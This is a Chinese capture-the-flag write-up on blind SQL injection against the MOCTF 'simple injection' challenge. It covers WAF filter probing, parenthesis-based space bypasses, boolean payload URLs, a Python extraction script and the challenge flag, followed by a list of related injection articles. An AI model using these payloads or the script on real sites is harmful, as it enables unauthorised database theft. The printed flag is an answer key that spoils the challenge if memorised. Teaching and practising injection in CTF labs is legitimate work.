最近在练习sql注入写脚本,记录一下思路,刚学的and 1=1也拿出来溜溜

http://119.23.73.3:5004/?id=1

  1. 首先,没有被过滤是正常显示。
  2. 没有被过滤但是查询不到就是空白,比如?id=99999
  3. waf过滤关键词,提示whatfuck

我首先判断的是有没有用trim()函数,要知道trim函数和过滤是不一样的。

区别很简单,举个例子。trim默认移除字符串左右两边的空格

  1.  http://119.23.73.3:5004/?id=1(此处1后边有空格)
  2.  如果使用了trim()函数,也过滤掉了空格。
  3.  那么这个不会出waf的,而是会正常显示id=1的内容。
  4.  会让你以为空格并没有过滤,是因为trim函数把空格去掉后才用waf函数进行的判断。

测试的方法很简单?id=1 1,让空格在里面就好了。

发现过滤了空格,寻找能够代替空格的字符。

  1. %20 %09 %0a %0b %0c %0d %a0 %00 /**/    ()

发现只有()没有被过滤。

判断是整形注入还是字符型注入,?id=1-0,发现不是id=1的界面,不是整形注入

判断id的保护是什么?首先猜测是引号,输入1'1,(这里为了排除trim函数的影响),发现没有出现waf,但是会出现空白。所以是单引号保护,因为单引号没有被过滤,会匹配原来保护id的两个单引号的前一个,导致了有一了孤零零的单引号没有人和他配对,就会出错,什么也查不出来。

判断截断字符有没有被过滤,发现尝试%23,--+,--%20都会被过滤。

所以考虑and '1这样绕过,匹配最后的那个',不让他孤零零,有任何他匹配就不会出错。

判断其他的过滤字符

  1. union被过滤,无法使用联合查询
  2. > < like regexp被过滤,但是=没有被过滤,between and 也没有被过滤。
  3. or被过滤,information这个一会再说,有点特殊。
  4. mid,ascii没有被过滤,逗号也没有被过滤。

判断逻辑

  1. http://119.23.73.3:5004/?id=1%27and(select(0))and%271
  2. http://119.23.73.3:5004/?id=1%27and(select(1))and%271

发现可以判断出来注入的逻辑,只要构造语句让select(0)和select(1)里面的1,0值出现就可以判断了。

脚本,py3

  1. import requests
  3. shiliu="0x20"
  4. zuihou="0x7f"
  5. i=1
  6. while True:
  7.     #http://119.23.73.3:5004/?id=1%27and(select(mid((select(database())),1,1))=%27m%27)and%271 #MOCTF
  8.     #url="http://119.23.73.3:5004/?id=1%27and(select(select(group_concat(table_name))from(information_schema.tables)where(table_schema)='moctf')between("+shiliu+")and(0x7f))and%271"  #DO_Y0U_L1KE_LONG_T4BLE_NAME,NEWS
  9.     #url="http://119.23.73.3:5004/?id=1%27and(select(select(group_concat(column_name))from(information_schema.columns)where(table_name)='do_y0u_l1ke_long_t4ble_name')between("+shiliu+")and(0x7f))and%271"  #D0_YOU_ALS0_L1KE_VERY_LONG_COLUMN_NAME
  10.     url="http://119.23.73.3:5004/?id=1%27and(select(ascii(mid((select(d0_you_als0_l1ke_very_long_column_name)from(do_y0u_l1ke_long_t4ble_name)),"+str(i)+",1)))between("+shiliu+")and(0x7f))and%271"  #D0_YOU_ALS0_L1KE_VERY_LONG_COLUMN_NAME
  11.     res=requests.get(url)
  12.     #print(url)
  14. #MOCTF{B1IND_SQL_1NJECTI0N_G0OD}
  16.     if "Hello" not in res.text:
  17.         i+=1
  18.         x=hex(int(shiliu,16)-1)
  19.         if '20' in x:
  20.             break;
  21.         print(x)
  22.         zuihou = shiliu + zuihou.replace("0x","")
  24.         shiliu="0x20"
  25.         #shiliu=x+shiliu.replace("0x","")   #跑前三个的时候这个不能注释掉,跑最后一个得注释掉
  27.     shiliu=str(hex(int(shiliu,16)+1))

数据库我是手动测试的,是moctf,然后剩下的,一开始偷了懒,没用ascii跑,结果flag大小写都提交不上,原因是flag有大写也有小写,数据库是对大小写不敏感的,用ascii就可以了

第一个语句我没用脚本跑,自己用手试出来的。

  1. moctf{b1ind_SQL_1njecti0n_g0od}
  2. 兄弟们不会做的就问啊,输出一下url,挨个看看怎么跑的,直接提交flag没啥用

最后说一下那个or被过滤了,为什么information没有被过滤。

information确实被过滤了,但是information只要加上其他为被过滤的字符,也不会被过滤。

为此还去群里问了下,

出题人:Waf加了智能识别语义,information语境就不过滤,这样听起来会不会更牛逼

MOCTF 简单注入的更多相关文章

  1. [BJDCTF2020]Mark loves cat && [BJDCTF 2nd]简单注入 && [BJDCTF2020]The mystery of ip

    [BJDCTF2020]Mark loves cat 源码泄露 使用GitHack.py下载源码 下载之后对源代码进行审计 flag.php代码为: <?php $flag = file_get ...

  2. [BJDCTF 2nd]简单注入

    [BJDCTF 2nd]简单注入 hint.txt出现了内容. 大概意思和国赛一道题相同. username处注入\来转义单引号,password处使用sql语句整数型注入. 例如: 传入admin\ ...

  3. 在PE文件中简单注入代码,实现在启动前弹窗

    获得的新知识: 1.kernel32.dll,user32.dll,ntdll.dll等一些dll在同一个PC环境下的映射到虚拟内存基址是一样的. 2.在win8以上系统上,更改PE文件的入口点要大于 ...

  4. BBSXP最新漏洞 简单注入检測 万能password

    BBSXP最新漏洞 漏洞日期:2005年7月1日受害版本号:眼下全部BBSXP漏洞利用:查前台password注入语句:blog.asp?id=1%20union%20select%201,1,use ...

  5. CTF—WEB—sql注入之无过滤有回显最简单注入

    sql注入基础原理 一.Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手 ...

  6. 刷题[BJDCTF 2nd]简单注入

    解题思路 打开发现登陆框,随机输入一些,发现有waf,然后回显都是同样的字符串.fuzz一波,发现禁了挺多东西的. select union 等 这里猜测是布尔盲注,错误的话显示的是:You konw ...

  7. 我的angularjs源码学习之旅2——依赖注入

    依赖注入起源于实现控制反转的典型框架Spring框架,用来削减计算机程序的耦合问题.简单来说,在定义方法的时候,方法所依赖的对象就被隐性的注入到该方法中,在方法中可以直接使用,而不需要在执行该函数的时 ...

  8. AngularJS的依赖注入方式

    在定义controller,module,service,and directive时有两种方式, 方式一: var myModule = angular.module('myApp', []); m ...

  9. CTF比赛中SQL注入的一些经验总结

    ctf中sql注入下的一些小技巧 最近花了一点时间总结了各大平台中注入的trick,自己还是太菜了,多半都得看题解,就特此做了一个paper方便总结 注释符 以下是Mysql中可以用到的单行注释符: ...

随机推荐

  1. 【Oracle】曾经的Oracle学习笔记(1-3) 数据库常见用语,常见命令,创建测试表

    一.数据库的登录 二.数据库常用语 三.测试表的创建,测试数据初始化 四.常见命令介绍 五.测试 user:jeffreysn:jeffrey user:systemsn:jeffrey 浏览器中输入 ...

  2. LEMP (LNMP) Stack-5.4.16 (OpenLogic CentOS 7.2)

    LEMP (LNMP) Stack-5.4.16 (OpenLogic CentOS 7.2) 平台: CentOS 类型: 虚拟机镜像 软件包: mariadb-5.5.47 nginx-1.6.3 ...

  3. 送H-1B 及其他I-129 申请别忘用新表

    (梁勇律师事务所,lianglaw.com专稿)移民局从2010年11月23日 更新了申请H-1B 及其他非移民工作签证I-129 表,从2010年12月23日以后收到的I-129表都必须是2010年 ...

  4. java Vamei快速教程09 类数据和类方法

    作者:Vamei 出处:http://www.cnblogs.com/vamei 欢迎转载,也请保留这段声明.谢谢! 我们一直是为了产生对象而定义类(class)的.对象是具有功能的实体,而类是对象的 ...

  5. 济南NOIP冬令营 选拔(select)

    选拔(select) Time Limit:2000ms   Memory Limit:128MB 题目描述 LYK对n个女生有好感.第i个女生的身高为ai. LYK要在这些女生中选拔出一个女生来作为 ...

  6. Centos 6版本Device eth0 does not seem to be present,delaying initialization.故障处理

    1.1  故障现象 2019年06月14日晚上,公司项目组说有台业务服务器连接不上,比较着急,我通过vpn拨入的方式远程登录到管理控制台查看发现网卡没有获取到IP地址,我尝试重启来重新启动,重启的时候 ...

  7. MySQL主从复制原理及配置过程

    一.Mysql数据库的主从复制原理过程: (多实例的安装请参考我的另一篇文章:https://www.cnblogs.com/Template/p/9258500.html) Mysql的主从复制是一 ...

  8. 二 python并发编程之多进程-重点

    一 multiprocessing模块介绍 python中的多线程无法利用多核优势,如果想要充分地使用多核CPU的资源(os.cpu_count()查看),在python中大部分情况需要使用多进程.P ...

  9. 课时5.什么是URL(理解)

    其实浏览器的地址栏中输入的地址就是一个URL. http://127.0.0.1/index.html(浏览器会自动添加:80) http://127.0.0.1:80/index.html(这是浏览 ...

  10. 【PHP】详解 $_SERVER 函数中QUERY_STRING和REQUEST_URI、SCRIPT_NAME、PHP_SELF区别

    实例:1.http://localhost/index.php/Home/Home/index.html $_SERVER['QUERY_STRING'] = ""; $_SERV ...